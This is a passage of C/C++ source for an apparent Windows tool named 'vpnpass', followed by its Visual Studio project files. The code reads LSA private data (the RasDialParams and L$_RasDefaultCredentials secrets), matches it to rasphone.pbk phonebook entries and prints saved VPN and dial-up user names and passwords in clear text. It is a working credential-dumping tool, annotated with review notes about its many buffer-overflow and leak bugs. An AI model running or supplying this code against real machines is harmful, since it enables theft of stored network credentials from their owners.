        proc(&Sid.s, &pSid);
        FreeLibrary(hLibrary);
        return pSid;
    }
    else
    {
        FreeLibrary(hLibrary);
        return NULL;
    }

    return NULL;
}

// Opens the local LSA policy with POLICY_GET_PRIVATE_INFORMATION and returns the
// private data stored under KeyName, or NULL when any step fails. The caller
// releases the result with LsaFreeMemory().
// NOTE(review): when LsaRetrievePrivateData() fails the function returns before
// LsaClose(), leaking the policy handle; when LsaClose() fails the retrieved
// data is dropped without being freed.
PLSA_UNICODE_STRING get_lsa_data(LPTSTR KeyName)
{
    NTSTATUS status;
    LSA_HANDLE LsaHandle;
    LSA_OBJECT_ATTRIBUTES LsaObjectAttribs = { 0 };
    LSA_UNICODE_STRING LsaKeyName;
    PLSA_UNICODE_STRING OutData;

    status = LsaOpenPolicy(NULL, &LsaObjectAttribs, POLICY_GET_PRIVATE_INFORMATION, &LsaHandle);
    if (status != 0)
        return NULL;

    StrToLsaStr(KeyName, &LsaKeyName);

    status = LsaRetrievePrivateData(LsaHandle, &LsaKeyName, &OutData);

    // The key name is only needed for the call above.
    free(LsaKeyName.Buffer);

    if (status != 0)
        return NULL;

    status = LsaClose(LsaHandle);

    if (status != 0)
        return NULL;

    return OutData;
}

// Splits one private-data blob into PASSWORDS records. The blob is converted to
// the ANSI code page and read as consecutive NUL-terminated strings in groups of
// ten: string 0 becomes uid, string 5 login, string 6 pass; the others are
// skipped. Records are written to pass[0], pass[1], ...
// NOTE(review): nothing bounds this parsing:
//   - strcpy() copies into 256-byte fields without a length limit;
//   - `index` is not compared with the number of elements the caller allocated;
//   - the WideCharToMultiByte() result is not checked, and a blob that does not
//     fit AnsiPsw (1024 bytes) is still walked up to Length / 2;
//   - the outer ++i runs in addition to the inner advance, which skips one more
//     byte per record — confirm this matches the stored layout.
void parse_lsa_data(PASSWORDS* pass, LPCWSTR Buffer, USHORT Length)
{
    char AnsiPsw[1024] = { 0 };
    int index = 0;
    // Length is in bytes, hence Length / 2 wide characters.
    WideCharToMultiByte(CP_ACP, 0, Buffer, Length / 2, AnsiPsw, sizeof(AnsiPsw), 0, 0);
    for (int i = 0; i < Length / 2 - 1; ++i)
    {
        for (int j = 0; j < 10; ++j)
        {
            switch (j)
            {
            case 0:
                strcpy(pass[index].uid, AnsiPsw + i);
                break;
            case 5:
                strcpy(pass[index].login, AnsiPsw + i);
                break;
            case 6:
                strcpy(pass[index].pass, AnsiPsw + i);
                break;
            }
            // Step over the current string and its terminator.
            i += strlen(AnsiPsw + i) + 1;
        }
        ++index;
    }
}

// Reads the two private-data keys this program knows about — the per-user key
// built from the account SID (format in Win2k) and the fixed key in WinXP — and
// parses each into `pass`.
// NOTE(review): get_local_sid() may return NULL, which is then passed to a %s
// conversion, and its result is never released; sprintf() into temp is
// unbounded. LsaFreeMemory() is given the address of the local pointer variable
// rather than the buffer it points to. Both parse_lsa_data() calls start writing
// at pass[0], so records from the second key overwrite those from the first.
void get_lsa_pass(PASSWORDS* pass)
{
    char Win2k[] = "RasDialParams!%s#0";
    char WinXP[] = "L$_RasDefaultCredentials#0";
    char temp[256];
    PLSA_UNICODE_STRING PrivateData = NULL;

    sprintf(temp, Win2k, get_local_sid());

    PrivateData = get_lsa_data(temp);
    if (PrivateData != NULL)
    {
        parse_lsa_data(pass, PrivateData->Buffer, PrivateData->Length);
        LsaFreeMemory(&PrivateData);
    }

    PrivateData = get_lsa_data(WinXP);
    if (PrivateData != NULL)
    {
        parse_lsa_data(pass, PrivateData->Buffer, PrivateData->Length);
        LsaFreeMemory(&PrivateData);
    }
}

// Returns the total number of sections (phonebook entries) in the per-user
// rasphone.pbk of `user` and in the rasphone.pbk under the folder returned for
// CSIDL value 0x23.
// NOTE(review): the per-user path is hard-coded to drive C: and chosen from the
// GetVersionEx() major version; sprintf() into the MAX_PATH buffers is
// unbounded; szPhoneBook2 is both the destination and a source argument of the
// same sprintf() call, which is undefined behaviour; section names beyond the
// 1024-byte buffer are silently not counted.
int get_item_count()
{
    int nCount = 0;
    LPSTR lpszPhoneBook[2];
    CHAR szSectionNames[1024] = { 0 };
    CHAR szPhoneBook1[MAX_PATH], szPhoneBook2[MAX_PATH];
    OSVERSIONINFO osi;

    osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osi);

    switch (osi.dwMajorVersion)
    {
    case 5:
        sprintf(szPhoneBook1, "C:\\Documents and Settings\\%s\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user);
        break;
    default:
        sprintf(szPhoneBook1, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user);
    }

    SHGetSpecialFolderPath(NULL, szPhoneBook2, 0x23, 0);
    sprintf(szPhoneBook2, "%s\\%s", szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

    lpszPhoneBook[0] = szPhoneBook1;
    lpszPhoneBook[1] = szPhoneBook2;

    for (int i = 0; i < _countof(lpszPhoneBook); i++)
    {
        memset(szSectionNames, 0, sizeof(szSectionNames));
        GetPrivateProfileSectionNames(szSectionNames, sizeof(szSectionNames), lpszPhoneBook[i]);
        // The buffer holds NUL-separated names ending with an empty string.
        for (LPTSTR lpSection = szSectionNames; *lpSection != '\0'; lpSection += strlen(lpSection) + 1)
            nCount++;
    }

    return nCount;
}

// Builds the result list: one RASDIALPINFO per phonebook section, with user name
// and password filled in when the section's DialParamsUID equals the uid of a
// parsed credential record. Returns NULL when there are no entries or the OS
// major version is below 5. The caller releases the list with LocalFree().
// NOTE(review):
//   - `pass` is allocated with new[] and neither initialised nor deleted; the
//     stricmp() against pass[j].uid reads uninitialised memory for records that
//     parse_lsa_data() did not fill, and the plaintext credentials stay in
//     leaked heap memory;
//   - the version check returns after `pass` has been allocated;
//   - the LocalAlloc() result is not checked;
//   - dwRasCount is a DWORD, so `<= 0` only ever tests for zero;
//   - the strcpy() calls copy 256-byte locals into the fixed-size struct fields
//     without a length limit;
//   - the path construction repeats the issues noted on get_item_count().
PRASDIALPINFOLIST get_item_info()
{
    CHAR szSectionNames[1024] = { 0 };
    CHAR szPhoneBook1[MAX_PATH], szPhoneBook2[MAX_PATH];
    LPSTR lpszPhoneBook[2];
    DWORD dwRasCount = 0;
    DWORD dwIndex = 0;
    PRASDIALPINFOLIST pRdiList = NULL;
    OSVERSIONINFO osi;

    dwRasCount = get_item_count();
    if (dwRasCount <= 0)
        return NULL;

    PASSWORDS* pass = new PASSWORDS[dwRasCount];

    get_lsa_pass(pass);

    osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osi);

    if (osi.dwMajorVersion < 5)
        return NULL;

    switch (osi.dwMajorVersion)
    {
    case 5:
        sprintf(szPhoneBook1, "C:\\Documents and Settings\\%s\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user);
        break;
    default:
        sprintf(szPhoneBook1, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user);
    }

    SHGetSpecialFolderPath(NULL, szPhoneBook2, 0x23, 0);
    sprintf(szPhoneBook2, "%s\\%s", szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

    lpszPhoneBook[0] = szPhoneBook1;
    lpszPhoneBook[1] = szPhoneBook2;

    // LPTR zero-initialises the block; the size covers the count field plus
    // dwRasCount rows.
    pRdiList = (PRASDIALPINFOLIST)LocalAlloc(LPTR, sizeof(RASDIALPINFO) * dwRasCount + sizeof(ULONG));

    pRdiList->ulCount = dwRasCount;

    for (int i = 0; i < _countof(lpszPhoneBook); i++)
    {
        memset(szSectionNames, 0, sizeof(szSectionNames));

        GetPrivateProfileSectionNames(szSectionNames, sizeof(szSectionNames), lpszPhoneBook[i]);

        for (LPTSTR lpSection = szSectionNames; *lpSection != '\0'; lpSection += strlen(lpSection) + 1)
        {
            char strDialParamsUID[256] = { 0 };
            char strUserName[256] = { 0 };
            char strPassWord[256] = { 0 };
            char strPhoneNumber[256] = { 0 };
            char strDevice[256] = { 0 };

            int nBufferLen = GetPrivateProfileString(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpszPhoneBook[i]);

            // Only entries that carry a DialParamsUID can be matched to a
            // credential record.
            if (nBufferLen > 0)
            {
                for (int j = 0; j < dwRasCount; j++)
                {
                    if (stricmp(strDialParamsUID, pass[j].uid) == 0)
                    {
                        strcpy(strUserName, pass[j].login);
                        strcpy(strPassWord, pass[j].pass);
                        break;
                    }
                }
            }

            GetPrivateProfileString(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strPhoneNumber), lpszPhoneBook[i]);
            GetPrivateProfileString(lpSection, "Device", 0, strDevice, sizeof(strDevice), lpszPhoneBook[i]);

            strcpy(pRdiList->rdi[dwIndex].szEntryName, lpSection);
            strcpy(pRdiList->rdi[dwIndex].szUserName, strUserName);
            strcpy(pRdiList->rdi[dwIndex].szPassword, strPassWord);
            strcpy(pRdiList->rdi[dwIndex].szPhoneNumber, strPhoneNumber);
            // The same "Device" value is stored as both device type and name.
            strcpy(pRdiList->rdi[dwIndex].szDeviceType, strDevice);
            strcpy(pRdiList->rdi[dwIndex].szDeviceName, strDevice);

            dwIndex++;
        }
    }

    return pRdiList;
}

// Entry point: argv[1] is the account name whose phonebook and credentials are
// read; the result is printed as a header line plus one tab-separated row per
// entry.
// NOTE(review): argv[1] is used without checking argc; the loop-local `user`
// shadows the global of the same name; passwords are written to stdout in clear
// text and the list is freed without being wiped first.
void main(int argc, char** argv)
{
    PRASDIALPINFOLIST pRdiList = NULL;

    user = argv[1];

    pRdiList = get_item_info();
    if (pRdiList == NULL)
        return;

    printf("name\tuser\tpassword\tphone\tdevname\tdevtype\n");

    for (int i = 0; i < pRdiList->ulCount; i++)
    {
        CHAR* name = pRdiList->rdi[i].szEntryName;
        CHAR* user = pRdiList->rdi[i].szUserName;
        CHAR* password = pRdiList->rdi[i].szPassword;
        CHAR* phone = pRdiList->rdi[i].szPhoneNumber;
        CHAR* devname = pRdiList->rdi[i].szDeviceName;
        CHAR* devtype = pRdiList->rdi[i].szDeviceType;

        printf("%s\t%s\t%s\t%s\t%s\t%s\n", name, user, password, phone, devname, devtype);
    }

    LocalFree(pRdiList);
}
-------------------------------------------------------------------------------- /vpnpass/vpnpass.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49} 23 | Win32Proj 24 | vpnpass 25 | 8.1 26 | vpnpass 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 
-------------------------------------------------------------------------------- /vpnpass/vpnpass.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | --------------------------------------------------------------------------------